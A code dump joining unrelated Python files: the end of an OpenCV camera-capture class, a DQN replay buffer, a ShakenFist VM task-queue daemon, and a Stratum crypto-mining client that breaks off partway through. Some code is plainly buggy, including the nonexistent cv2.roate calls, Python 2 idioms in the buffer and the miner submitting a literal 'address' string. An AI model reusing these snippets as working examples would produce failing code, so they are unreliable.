if (self._output_height > 0) or (self._flip_method > 0):
# adjust output height
img_resized = cv2.resize(img, self._output_res)
# flip resized image
if self._flip_method == 0: # no flipping
img_proc = img_resized
elif self._flip_method == 1: # ccw 90
img_proc = cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif self._flip_method == 2: # rot 180, same as flip lr & up
img_proc = cv2.roate(img_resized, cv2.ROTATE_180)
elif self._flip_method == 3: # cw 90
img_proc = cv2.roate(img_resized, cv2.ROTATE_90_CLOCKWISE)
elif self._flip_method == 4: # horizontal
img_proc = cv2.flip(img_resized, 0)
elif self._flip_method == 5: # upright diagonal. ccw & lr
img_proc = cv2.flip(cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE), 1)
elif self._flip_method == 6: # vertical
img_proc = cv2.flip(img_resized, 1)
elif self._flip_method == 7: # upperleft diagonal
img_proc = cv2.transpose(img_resized)
else:
img_proc = img_resized # not a valid flip method
else:
img_proc = img
self.capture.put_nowait((self.frame_time, img_proc))
else:
self.log.put_nowait((logging.WARNING, "CV2:Capture Queue is full!"))
# FPS calculation
if (current_time - last_time) >= 5.0: # update frame rate every 5 secs
self.measured_fps = num_frames/5.0
self.log.put_nowait((logging.INFO, "CAM:FPS:{}".format(self.measured_fps)))
last_time = current_time
num_frames = 0
self.cam.release()
# Setup the Camera
############################################################################
def _open_cam(self):
"""
Open up the camera so we can begin capturing frames
"""
# Open the camera with platform optimal settings
if sys.platform.startswith('win'):
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_MSMF)
elif sys.platform.startswith('darwin'):
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_AVFOUNDATION)
elif sys.platform.startswith('linux'):
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_V4L2)
else:
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_ANY)
self.cam_open = self.cam.isOpened()
if self.cam_open:
# Apply settings to camera
if self._camera_res[0] > 0:
self.width = self._camera_res[0] # image resolution
if self._camera_res[1] > 0:
self.height = self._camera_res[1] # image resolution
self.autoexposure = self._autoexposure # autoexposure
if self._exposure > 0:
self.exposure = self._exposure # camera exposure
if self._buffersize > 0:
self.buffersize = self._buffersize # camera drive buffer size
if not self._fourcc == -1:
self.fourcc = self._fourcc # camera sensor encoding format
if self._framerate > 0:
self.fps = self._framerate # desired fps
else:
self.log.put_nowait((logging.CRITICAL, "CV2:Failed to open camera!"))
# Camera routines #################################################
# Reading and setting camera options
###################################################################
@property
def width(self):
""" returns video capture width """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)
else: return float("NaN")
@width.setter
def width(self, val):
""" sets video capture width """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Width not changed:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set width to {}!".format(val)))
@property
def height(self):
""" returns videocapture height """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)
else: return float("NaN")
@height.setter
def height(self, val):
""" sets video capture height """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Height not changed:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val))
if isok:
self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set height to {}!".format(val)))
@property
def resolution(self):
""" returns current resolution width x height """
if self.cam_open:
return [self.cam.get(cv2.CAP_PROP_FRAME_WIDTH),
self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)]
else: return [float("NaN"), float("NaN")]
@resolution.setter
def resolution(self, val):
if val is None: return
if self.cam_open:
if len(val) > 1: # have width x height
with self.cam_lock:
isok0 = self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, int(val[0]))
isok1 = self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val[1]))
if isok0 and isok1:
self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val[0])))
self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val[1])))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set resolution to {},{}!".format(val[0],val[1])))
else: # given only one value for resolution
with self.cam_lock:
isok0 = self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, int(val))
isok1 = self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val))
if isok0 and isok1:
self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val)))
self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set resolution to {},{}!".format(val,val)))
else: # camera not open
self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set resolution, camera not open!"))
@property
def exposure(self):
""" returns curent exposure """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_EXPOSURE)
else: return float("NaN")
@exposure.setter
def exposure(self, val):
""" # sets current exposure """
self._exposure = val
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set exposure to {}!".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_EXPOSURE, self._exposure)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Exposure:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set expsosure to:{}".format(val)))
@property
def autoexposure(self):
""" returns curent exposure """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_AUTO_EXPOSURE)
else: return float("NaN")
@autoexposure.setter
def autoexposure(self, val):
""" sets autoexposure """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set Autoexposure to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Autoexposure:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set Autoexposure to:{}".format(val)))
@property
def fps(self):
""" returns current frames per second setting """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FPS)
else: return float("NaN")
@fps.setter
def fps(self, val):
""" set frames per second in camera """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set framerate to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FPS, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:FPS:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set FPS to:{}".format(val)))
@staticmethod
def decode_fourcc(val):
""" decode the fourcc integer to the chracter string """
return "".join([chr((int(val) >> 8 * i) & 0xFF) for i in range(4)])
@property
def fourcc(self):
""" return video encoding format """
if self.cam_open:
self._fourcc = self.cam.get(cv2.CAP_PROP_FOURCC)
self._fourcc_str = self.decode_fourcc(self._fourcc)
return self._fourcc_str
else: return "None"
@fourcc.setter
def fourcc(self, val):
""" set video encoding format in camera """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set FOURCC to:{}!".format(val)))
return
if isinstance(val, str): # we need to convert from FourCC to integer
self._fourcc = cv2.VideoWriter_fourcc(val[0],val[1],val[2],val[3])
self._fourcc_str = val
else: # fourcc is integer/long
self._fourcc = val
self._fourcc_str = self.decode_fourcc(val)
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FOURCC, self._fourcc)
if isok :
self.log.put_nowait((logging.INFO, "CV2:FOURCC:{}".format(self._fourcc_str)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set FOURCC to:{}".format(self._fourcc_str)))
@property
def buffersize(self):
""" return opencv camera buffersize """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_BUFFERSIZE)
else: return float("NaN")
@buffersize.setter
def buffersize(self, val):
""" set opencv camera buffersize """
if val is None or val == -1:
self.log.put_nowait((logging.WARNING, "CV2:Can not set buffer size to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_BUFFERSIZE, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Buffersize:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set buffer size to:{}".format(val)))
###############################################################################
# Testing
###############################################################################
if __name__ == '__main__':
configs = {
'camera_res' : (1920, 1080), # CAP_PROP_FRAME_WIDTH, CAP_PROP_FRAME_HEIGHT
'exposure' : -6, # camera specific e.g. -5 =(2^-5)=1/32, 0 = auto, 1...max=frame interval in microseconds
'autoexposure' : 3.0, # cv2 camera only, depends on camera: 0.25 or 0.75(auto), -1,0,1
'fps' : 30, # 120fps only with MJPG fourcc
'fourcc' : "MJPG", # cv2 camera only: MJPG, YUY2, YUYV
'buffersize' : -1, # default is 4 for V4L2, max 10,
'fov' : 77, # camera lens field of view in degress
'output_res' : (-1, -1), # Output resolution
'flip' : 0, # 0=norotation
'displayfps' : 5 # frame rate for display server
}
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger("Capture")
logger.log(logging.DEBUG, "Starting Capture")
camera = cv2Capture(configs,camera_num=0)
camera.start()
logger.log(logging.DEBUG, "Getting Frames")
window_handle = cv2.namedWindow("Camera", cv2.WINDOW_AUTOSIZE)
while(cv2.getWindowProperty("Camera", 0) >= 0):
try:
(frame_time, frame) = camera.capture.get()
cv2.imshow('Camera', frame)
except: pass
if cv2.waitKey(1) & 0xFF == ord('q'): break
try:
(level, msg)=camera.log.get_nowait()
logger.log(level, "CV2:{}".format(msg))
except: pass
camera.stop()
cv2.destroyAllWindows()
|
replay_buffer.py
|
try:
import queue
except:
import Queue as queue
from random import shuffle
from random import seed
seed(123)
from threading import Thread
import numpy as np
import time
import tensorflow as tf
try:
import Queue as Q # ver. < 3.0
except ImportError:
import queue as Q
from sklearn.preprocessing import normalize
PriorityQueue = Q.PriorityQueue
# Custom prioriy queue that is able to clear the queue once it is full
# and cut it to half. Therefore, everytime size of buffer is dqn_replay_buffer_size,
# we will keep half of the most valuable states and remove the rest to provide
# space for new experiences
class CustomQueue(PriorityQueue):
'''
A custom queue subclass that provides a :meth:`clear` method.
'''
def __init__(self, size):
PriorityQueue.__init__(self, size)
def clear(self):
'''
Clears all items from the queue.
'''
with self.mutex:
unfinished = self.unfinished_tasks - len(self.queue)
if unfinished <= 0:
if unfinished < 0:
raise ValueError('task_done() called too many times')
self.all_tasks_done.notify_all()
self.queue = self.queue[0:len(self.queue)/2]
self.unfinished_tasks = unfinished + len(self.queue)
self.not_full.notify_all()
def isempty(self):
with self.mutex:
return len(self.queue) == 0
def isfull(self):
with self.mutex:
return len(self.queue) == self.maxsize
class Transition(object):
"""
A class for holding the experiences collected from seq2seq model
"""
def __init__(self, state, action, state_prime, action_prime, reward, q_value, done):
"""
Args:
state: current decoder output state
action: the greedy action selected from current decoder output
state_prime: next decoder output state
reward: reward of the greedy action selected
q_value: Q-value of the greedy action selected
done: whether we reached End-Of-Sequence or not
"""
self.state = state # size: dqn_input_feature_len
self.action = action # size: 1
self.state_prime = state_prime # size: dqn_input_feature_len
self.action_prime = action_prime
self.reward = reward # size: vocab_size
self.q_value = q_value # size: vocab_size
self.done = done # true/false
def __cmp__(self, item):
""" PriorityQueue uses this functino to sort the rewards
Args:
We sort the queue such that items with higher rewards are in the head of max-heap
"""
return cmp(item.reward, self.reward) # bigger numbers have more priority
class ReplayBatch(object):
""" A class for creating batches required for training DDQN. """
def __init__(self, hps, example_list, dqn_batch_size, use_state_prime = False, max_art_oovs = 0):
"""
Args:
hps: seq2seq model parameters
example_list: list of experiences
dqn_batch_size: DDQN batch size
use_state_prime: whether to use the next decoder state to make the batch or the current one
max_art_oovs: number of OOV tokens in current batch
Properties:
_x: The input to DDQN model for training, this is basically the decoder output (dqn_batch_size, dqn_input_feature_len)
_y: The Q-estimation (dqn_batch_size, vocab_size)
_y_extended: The Q-estimation (dqn_batch_size, vocab_size + max_art_oovs)
"""
self._x = np.zeros((dqn_batch_size, hps.dqn_input_feature_len))
self._y = np.zeros((dqn_batch_size, hps.vocab_size))
self._y_extended = np.zeros((dqn_batch_size, hps.vocab_size + max_art_oovs))
for i,e in enumerate(example_list):
if use_state_prime:
self._x[i,:]=e.state_prime
else:
self._x[i,:]=e.state
self._y[i,:]=normalize([e.q_value[0:hps.vocab_size]], axis=1, norm='l1')
if max_art_oovs == 0:
self._y_extended[i,:] = normalize([e.q_value[0:hps.vocab_size]], axis=1, norm='l1')
else:
self._y_extended[i,:] = e.q_value
class ReplayBuffer(object):
""" A class for implementing the priority experience buffer. """
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, hps):
self._hps = hps
self._buffer = CustomQueue(self._hps.dqn_replay_buffer_size)
self._batch_queue = queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = queue.Queue(self.BATCH_QUEUE_MAX * self._hps.dqn_batch_size)
self._num_example_q_threads = 1 # num threads to fill example queue
self._num_batch_q_threads = 1 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
return None
batch = self._batch_queue.get() # get the next Batch
return batch
@staticmethod
def create_batch(_hps, batch, batch_size, use_state_prime=False, max_art_oovs=0):
""" Create a DDQN-compatible batch from the input transitions
Args:
_hps: seq2seq model parameters
batch: a list of Transitions
dqn_batch_size: DDQN batch size
use_state_prime: whether to use the next decoder state to make the batch or the current one
max_art_oovs: number of OOV tokens in current batch
Returns:
An object of ReplayBatch class
"""
return ReplayBatch(_hps, batch, batch_size, use_state_prime, max_art_oovs)
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
while True:
try:
input_gen = self._example_generator().next()
except StopIteration: # if there are no more examples:
tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
raise Exception("single_pass mode is off but the example generator is out of data; error.")
self._example_queue.put(input_gen) # place the pair in the example queue.
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue."""
while True:
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self._hps.dqn_batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
# feed back all the samples to the buffer
self.add(inputs)
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self._hps.dqn_batch_size):
batches.append(inputs[i:i + self._hps.dqn_batch_size])
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(ReplayBatch(self._hps, b, self._hps.dqn_batch_size))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def add(self, items):
""" Adding a list of experiences to the buffer. When buffer is full,
we get rid of half of the least important experiences and keep the rest.
Args:
items: A list of experiences of size (batch_size, k, max_dec_steps, hidden_dim)
"""
for item in items:
if not self._buffer.isfull():
self._buffer.put_nowait(item)
else:
print('Replay Buffer is full, getting rid of unimportant transitions...')
self._buffer.clear()
self._buffer.put_nowait(item)
print('ReplayBatch size: {}'.format(self._buffer.qsize()))
print('ReplayBatch example queue size: {}'.format(self._example_queue.qsize()))
print('ReplayBatch batch queue size: {}'.format(self._batch_queue.qsize()))
def _buffer_len(self):
return self._buffer.qsize()
def _example_generator(self):
while True:
if not self._buffer.isempty():
item = self._buffer.get_nowait()
self._buffer.task_done()
yield item
|
queues.py
|
import copy
import multiprocessing
import re
import requests
import setproctitle
import time
from shakenfist.config import config
from shakenfist.daemons import daemon
from shakenfist import db
from shakenfist import exceptions
from shakenfist.images import Image
from shakenfist import logutil
from shakenfist import net
from shakenfist import scheduler
from shakenfist import util
from shakenfist import virt
from shakenfist.tasks import (QueueTask,
DeleteInstanceTask,
ErrorInstanceTask,
FetchImageTask,
InstanceTask,
PreflightInstanceTask,
StartInstanceTask,
)
LOG, _ = logutil.setup(__name__)
def handle(jobname, workitem):
log = LOG.withField('workitem', jobname)
log.info('Processing workitem')
setproctitle.setproctitle(
'%s-%s' % (daemon.process_name('queues'), jobname))
instance_uuid = None
task = None
try:
for task in workitem.get('tasks', []):
if not QueueTask.__subclasscheck__(type(task)):
raise exceptions.UnknownTaskException(
'Task was not decoded: %s' % task)
if (InstanceTask.__subclasscheck__(type(task)) or
isinstance(task, FetchImageTask)):
instance_uuid = task.instance_uuid()
if instance_uuid:
log_i = log.withInstance(instance_uuid)
else:
log_i = log
log_i.withField('task_name', task.name()).info('Starting task')
# TODO(andy) Should network events also come through here eventually?
# Then this can be generalised to record events on networks/instances
# TODO(andy) This event should be recorded when it is recorded as
# dequeued in the DB. Currently it's reporting action on the item
# and calling it 'dequeue'.
if instance_uuid:
# TODO(andy) move to QueueTask
db.add_event('instance', instance_uuid, task.pretty_task_name(),
'dequeued', None, 'Work item %s' % jobname)
if isinstance(task, FetchImageTask):
image_fetch(task.url(), instance_uuid)
elif isinstance(task, PreflightInstanceTask):
redirect_to = instance_preflight(instance_uuid, task.network())
if redirect_to:
log_i.info('Redirecting instance start to %s'
% redirect_to)
db.place_instance(instance_uuid, redirect_to)
db.enqueue(redirect_to, workitem)
return
elif isinstance(task, StartInstanceTask):
instance_start(instance_uuid, task.network())
db.update_instance_state(instance_uuid, 'created')
db.enqueue('%s-metrics' % config.NODE_NAME, {})
elif isinstance(task, DeleteInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'deleted')
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
elif isinstance(task, ErrorInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'error')
if task.error_msg():
db.update_instance_error_message(
instance_uuid, task.error_msg())
db.enqueue('%s-metrics' % config.NODE_NAME, {})
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
else:
log_i.withField('task', task).error('Unhandled task - dropped')
log_i.info('Task complete')
except exceptions.ImageFetchTaskFailedException as e:
# Usually caused by external issue and not an application error
log.info('Fetch Image Error: %s', e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
finally:
db.resolve(config.NODE_NAME, jobname)
if instance_uuid:
db.add_event('instance', instance_uuid, 'tasks complete',
'dequeued', None, 'Work item %s' % jobname)
log.info('Completed workitem')
def image_fetch(url, instance_uuid):
instance = None
if instance_uuid:
instance = virt.from_db(instance_uuid)
try:
# TODO(andy): Wait up to 15 mins for another queue process to download
# the required image. This will be changed to queue on a
# "waiting_image_fetch" queue but this works now.
with db.get_lock('image', config.NODE_NAME, Image.calc_unique_ref(url),
timeout=15*60, op='Image fetch') as lock:
img = Image.from_url(url)
img.get([lock], instance)
db.add_event('image', url, 'fetch', None, None, 'success')
except (exceptions.HTTPError, requests.exceptions.RequestException) as e:
LOG.withField('image', url).info('Failed to fetch image')
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'Image fetch failed: %s' % e)
# Clean common problems to store in events
msg = str(e)
re_conn_err = re.compile(r'.*NewConnectionError\(\'\<.*\>: (.*)\'')
m = re_conn_err.match(msg)
if m:
msg = m.group(1)
db.add_event('image', url, 'fetch', None, None, 'Error: '+msg)
raise exceptions.ImageFetchTaskFailedException(
'Failed to fetch image %s' % url)
def instance_preflight(instance_uuid, network):
db.update_instance_state(instance_uuid, 'preflight')
s = scheduler.Scheduler()
instance = virt.from_db(instance_uuid)
try:
s.place_instance(instance, network, candidates=[config.NODE_NAME])
return None
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'retry', None,
'insufficient resources: ' + str(e))
if instance.db_entry.get('placement_attempts') > 3:
raise exceptions.AbortInstanceStartException(
'Too many start attempts')
try:
if instance.db_entry.get('requested_placement'):
candidates = [instance.db_entry.get('requested_placement')]
else:
candidates = []
for node in s.metrics.keys():
if node != config.NODE_NAME:
candidates.append(node)
candidates = s.place_instance(instance, network,
candidates=candidates)
return candidates[0]
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'failed', None,
'insufficient resources: ' + str(e))
# This raise implies delete above
raise exceptions.AbortInstanceStartException(
'Unable to find suitable node')
def instance_start(instance_uuid, network):
log = LOG.withField('instance', instance_uuid)
with db.get_lock(
'instance', None, instance_uuid, ttl=900, timeout=120,
op='Instance start') as lock:
instance = virt.from_db(instance_uuid)
# Collect the networks
nets = {}
for netdesc in network:
if netdesc['network_uuid'] not in nets:
n = net.from_db(netdesc['network_uuid'])
if not n:
db.enqueue_instance_error(instance_uuid, 'missing network')
return
nets[netdesc['network_uuid']] = n
# Create the networks
with util.RecordedOperation('ensure networks exist', instance):
for network_uuid in nets:
n = nets[network_uuid]
try:
n.create()
n.ensure_mesh()
n.update_dhcp()
except exceptions.DeadNetwork as e:
log.withField('network', n).warning(
'Instance tried to use dead network')
db.enqueue_instance_error(
instance_uuid, 'tried to use dead network: %s' % e)
return
# Allocate console and VDI ports
instance.allocate_instance_ports()
# Now we can start the instance
libvirt = util.get_libvirt()
try:
with util.RecordedOperation('instance creation',
instance):
instance.create(lock=lock)
except libvirt.libvirtError as e:
code = e.get_error_code()
if code in (libvirt.VIR_ERR_CONFIG_UNSUPPORTED,
libvirt.VIR_ERR_XML_ERROR):
db.enqueue_instance_error(instance_uuid,
'instance failed to start: %s' % e)
return
for iface in db.get_instance_interfaces(instance_uuid):
db.update_network_interface_state(iface['uuid'], 'created')
def instance_delete(instance_uuid):
with db.get_lock('instance', None, instance_uuid, timeout=120,
op='Instance delete'):
db.add_event('instance', instance_uuid,
'queued', 'delete', None, None)
# Create list of networks used by instance
instance_networks = []
for iface in list(db.get_instance_interfaces(instance_uuid)):
if not iface['network_uuid'] in instance_networks:
instance_networks.append(iface['network_uuid'])
# Create list of networks used by all other instances
host_networks = []
for inst in list(db.get_instances(only_node=config.NODE_NAME)):
if not inst['uuid'] == instance_uuid:
for iface in db.get_instance_interfaces(inst['uuid']):
if not iface['network_uuid'] in host_networks:
host_networks.append(iface['network_uuid'])
instance_from_db_virt = virt.from_db(instance_uuid)
if instance_from_db_virt:
instance_from_db_virt.delete()
# Check each network used by the deleted instance
for network in instance_networks:
n = net.from_db(network)
if n:
# If network used by another instance, only update
if network in host_networks:
with util.RecordedOperation('deallocate ip address',
instance_from_db_virt):
n.update_dhcp()
else:
# Network not used by any other instance therefore delete
with util.RecordedOperation('remove network', n):
n.delete()
class Monitor(daemon.Daemon):
def run(self):
workers = []
LOG.info('Starting Queues')
libvirt = util.get_libvirt()
conn = libvirt.open(None)
present_cpus, _, _ = conn.getCPUMap()
while True:
try:
for w in copy.copy(workers):
if not w.is_alive():
w.join(1)
workers.remove(w)
if len(workers) < present_cpus / 2:
jobname, workitem = db.dequeue(config.NODE_NAME)
else:
workitem = None
if not workitem:
time.sleep(0.2)
continue
p = multiprocessing.Process(
target=handle, args=(jobname, workitem,),
name='%s-worker' % daemon.process_name('queues'))
p.start()
workers.append(p)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
|
terminate_the_fuck_gpu.py
|
#A stratum compatible miniminer
#based in the documentation
#https://slushpool.com/help/#!/manual/stratum-protocol
#2017-2019 Martin Nadal https://martinnadal.eu
import socket
import json
import random
import traceback
import tdc_mine
import time
from multiprocessing import Process, Queue, cpu_count
from numba import cuda # Библиотека Nvidia для работы с GPU
bfh = bytes.fromhex
def hash_decode(x: str) -> bytes:
return bfh(x)[::-1]
def target_to_bits(target: int) -> int:
c = ("%066x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int.from_bytes(bfh(c[:6]), byteorder='big')
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def bits_to_target(bits: int) -> int:
bitsN = (bits >> 24) & 0xff
if not (0x03 <= bitsN <= 0x20):
raise Exception("First part of bits should be in [0x03, 0x1d]")
bitsBase = bits & 0xffffff
if not (0x8000 <= bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN - 3))
def bh2u(x: bytes) -> str:
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
"""
return x.hex()
def miner_thread(xblockheader, difficult):
nonce = random.randint(0, 2 ** 32 - 1) # job.get('nonce')
nonce_and_hash = tdc_mine.miner_thread(xblockheader, difficult, nonce)
return nonce_and_hash
def worker(xblockheader, payload1, payload2, bdiff, sock, number):
while 1:
# started = time.time()
z = miner_thread(xblockheader, bdiff)
# print(f'{number} thread yay!!! Time:', time.time() - started, 'Diff', difficult)
print(payload1 + z[:8] + payload2)
sock.sendall(payload1 + z[:8] + payload2)
def miner(address, host, port, cpu_count=cpu_count(), password='password'):
print("address:{}".format(address))
print("host:{} port:{}".format(host, port))
print("Count threads: {}".format(cpu_count))
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print("Socket connected")
sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": ["pytideminer-1.0.0"]}\n')
lines = sock.recv(1024).decode().split('\n')
response = json.loads(lines[0])
sub_details, extranonce1, extranonce2_size = response['result']
print(response)
extranonce2 = '00' * extranonce2_size
sock.sendall(b'{"params": ["' + address.encode() + b'", "' + password.encode() + b'"], "id": 2, "method": "mining.authorize"}\n')
print("Mining authorize")
procs = []
count = cpu_count
print("start mining")
new_time = time.time()
count_shares = 0
global_count_share = 0
global_count_success_share = 0
difficult = 0.5
while True:
response = sock.recv(2024).decode()
responses = [json.loads(res) for res in response.split('\n') if len(res.strip()) > 0]
for response in responses:
if response['id'] == 4 and not response['error']:
count_shares += 1
global_count_share += 1
global_count_success_share += 1
print(f"accepted: {global_count_success_share}/{global_count_share} ({round(global_count_success_share/global_count_share*100)}%) (yay!!!)")
elif response['id'] == 4 and response['error']:
global_count_share += 1
print("boooo", response['error'])
elif response['id'] == 2 and not response['error']:
print("Authorize successful!!!")
elif response['id'] == 2 and response['error']:
print("Authorize error!!!", response['error'])
# get rid of empty lines
elif response['method'] == 'mining.set_difficulty':
old_diff = difficult
difficult = response['params'][0]
bdiff = bytes(str(difficult), "UTF-8")
print("New stratum difficulty: ", difficult)
elif response['method'] == 'mining.notify':
job_id, prevhash, coinb1, coinb2, merkle_branch, \
version, nbits, ntime, clean_jobs = response['params']
d = ''
for h in merkle_branch:
d += h
merkleroot_1 = tdc_mine.sha256d_str(coinb1.encode('utf8'), extranonce1.encode('utf8'),
extranonce2.encode('utf8'), coinb2.encode('utf8'), d.encode('utf8'))
xblockheader0 = version + prevhash + merkleroot_1.decode('utf8') + ntime + nbits
print("Mining notify")
for proc in procs:
proc.terminate()
procs = []
old_time = new_time
new_time = time.time()
xnonce = "00000000"
xblockheader = (xblockheader0 + xnonce).encode('utf8')
payload1 = bytes(
'{"params": ["' + "address" + '", "' + job_id + '", "' + extranonce2 + '", "' + ntime + '", "',
"UTF-8")
payload2 = bytes('"], "id": 4, "method": "mining.submit"}\n', "UTF-8")
for number in range(count):
proc = Process(target=worker, args=(xblockheader, payload1, payload2, bdiff, sock, number + 1))
proc.daemon = True
procs.append(proc)
proc.start()
if count_shares:
hashrate = count_shares * (old_diff / 65536) * 2 ** 32 / (new_time-old_time)
print(f"Found {count_shares} shares in {round(new_time-old_time)} seconds at diff", old_diff)
print(f"Current Hashrate:", round(hashrate), "H/s")
print(f"Recommended diff:", round((count_shares*10/(new_time-old_time))*old_diff, 2))
old_diff = difficult
count_shares = 0
except KeyboardInterrupt:
for proc in procs:
proc.terminate()
sock.close()
except:
print(traceback.format_exc())
try:
for proc in procs:
proc.terminate()
except:
pass
try:
sock.close()
except:
pass
print("Connection refused, restart after 30 s")
time.sleep(30)
miner(address, host, port, cpu_count, password)
if __name__ == "__main__":
import argparse
import sys
# Parse the command line
parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
"If you like this piece of software, please "
